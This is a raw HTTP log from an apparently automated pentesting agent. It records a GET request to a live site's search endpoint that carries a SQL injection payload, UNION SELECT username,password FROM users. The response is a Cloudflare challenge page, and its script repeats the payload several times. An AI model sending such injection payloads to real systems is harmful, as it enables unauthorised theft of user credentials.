REQUEST:
GET https://my.myfirst.tech/search?email=%27%20UNION%20SELECT%20username%2Cpassword%20FROM%20users--
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9438
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c847621d2ba110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=sB0ER2Njg5ZMNLGmjSMqskgMq1LSgvvkAth4aDo3zJjQQYUUnVHnsb0ktkbu7IpeX0%2BSJX5BVIOiaydqBfu9VQpaCaEqaHSE9tXZmu%2B0s9MLT7IraKAWwGwFa1R1Yb3qVHfyLzWFqg93ub1Q2w%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c847621d2ba110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'OiAlN22FEzJ7g_E4ihlVSshCWEvkBJHrROZyk_GG958-1784281160-1.2.1.1-Zfs3RTVBCSDtvg0Nnp5Y6SPG4sFSjZ3PHx0v96OVPQQS1.U3PohBTFrrCLjIGD1C',cITimeS: '1784281160',cRay: 'a1c847621d2ba110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?email=%27+UNION+SELECT+username%2Cpassword+FROM+users--\u0026__cf_chl_tk=h4o_dPqDv06CresxYHYDteCVMXlIQnx.6gE38FF7MkA-1784281160-1.0.1.1-ynYOtx57QnHZaE7rqyYTBPqrSIEkQsHXKiCwnXFPMJs",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?email=%27+UNION+SELECT+username%2Cpassword+FROM+users--\u0026__cf_chl_f_tk=h4o_dPqDv06CresxYHYDteCVMXlIQnx.6gE38FF7MkA-1784281160-1.0.1.1-ynYOtx57QnHZaE7rqyYTBPqrSIEkQsHXKiCwnXFPMJs",md: 'pXqyF8K4HdtUQgb_SQjQqiDBhyhqr6Af03Mkttq11L0-1784281160-1.2.1.1-otz5hVk5Fh3yT097ImsJEPHykh15EVqlt1dwJM_7CJviM80e7XIu5LjVKBaqAXioDMau.nUaKLK5DMlaHqELh9D1JEc5iw2.SI_0cY0Aa3DIyq5zLz4Cu3mpZdbDw.X9jQG.A2Vm3HWsDNfT_W.5MBjs.Cyq3XIJOFucN4Xxp.Lqud3V7OSikoWsHmNTtMxKhCcsYGYO5QdzkkGDGErkGfHHHSGOevlyJs_zwY9zN2FbUJc7MMaSle3jYBRsdVCyXz.EK4pjAa7LxSx6z3S.o2moVwIVaXe13mpzjVC_Lgp6_Qrzgv4GygXHQgME6bM3pXXw0g5oymA.Oe7MzTVUgJ8Or3nXrWFrwOr8_urGrXBixj8CEQKZ2UTQudkcFYKJEgXqL8kWj2VW6pacVW3wDyJG6OVNzwLzWfSvfV12Yt4sNpuJgEeMwEE7qnQL0mYMV.7kkWpVZm4PN7VAqdTZeiwynaiUhFxAh7neOvyV2HcfHDyYcB2nNjmHksbGCudvS5UtIbJ10PxGc3qaSTQBoTlqO9xEoMD.ButUCu1JOtXKgmxhwwE2QRuODUkRyr7OMK125xLwTPE_V5fIC7C49l66oL9uSVijXFTOgK11gNnKtm4K4onuROoOg5oc20Hz2.jgthMXipKiRPTbRAge2PrOFuTiq.XIga2DjPrEYpbMchKDLVqB0e2ZqGdVXoGLhT6dlUbKApCvIUMYjKpHi2UkSblx4Xiw5vE2XtBKlJrbLJ_m7Yo4jf4tYK4sak_GL1I29StIbNA6CzQqhIjsr_hBXW9hnDNJErUoKoWOD5xcYW_FxmR5OQb149.To9IOU0.uEF8qk7VNrlUemVX1rR6g6Yf.KNVV1nk4yj33IW6EMbdOsbze9E54T0iDL4V3_b3Vw3UF6hRpKd76ZmJtjsHlKq6MnVD8zgCKOGt.5PbVhjT10czVpAfjNHLQMGi0LFGxSQQxorJpJajfixiXxHo6zkwx1v5_pMLg_fkFFrZ0hLix9b_vSfQzvD0GQAT.O2WI.2ZPT86Bhu.0iHfgT.c98R3F8BDgI8HsfCH_GD9X.HnrTlUKZBteYx_tL2hKRi7KJzQySXd5aSJN9MC7FUZ95UgtpAQb7pKsImWrKpJaWBOI5.t1.exYf4viLC7noJ0ViE7bTDjMaGpnGnL8sIg8FMbKhbgk6p02ftUL5QD.jfIb.HNdzAZsTvWJYXEY_wkIXSFl9uw4DGcrtIksZg',mdrd: 'zVnGO1f.dKU81FpbbH1O3HfSqx0BBcXbrrcRDT727yM-1784281160-1.2.1.1-vk24TXki0OXjL_sh2GK478FqI.8Q6m9HhdhZpyXRArgZp3ZKSkZX.CamezEJhXG6YZEWWef5N7gD4QvLfMv4gdoQ.PAVl0Xe8KtnvH4sEIgaQxSJZJ7ARYWLPA2XhfK7p_EAoQrjJzG.GcuqNYJyuwnVtvlRMblm1tbGpH_CE0pHlib3YAOxVZ_bvSw1OSH2UAczOH2uIACMMNtIZfDw0Tu0tWmgitEhOcGHcxcBpQxbeXWx1.t.X.9rT8MwY49a',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c847621d2ba110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?email=%27+UNION+SELECT+username%2Cpassword+FROM+users--\u0026__cf_chl_rt_tk=h4o_dPqDv06CresxYHYDteCVMXlIQnx.6gE38FF7MkA-1784281160-1.0.1.1-ynYOtx57QnHZaE7rqyYTBPqrSIEkQsHXKiCwnXFPMJs"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
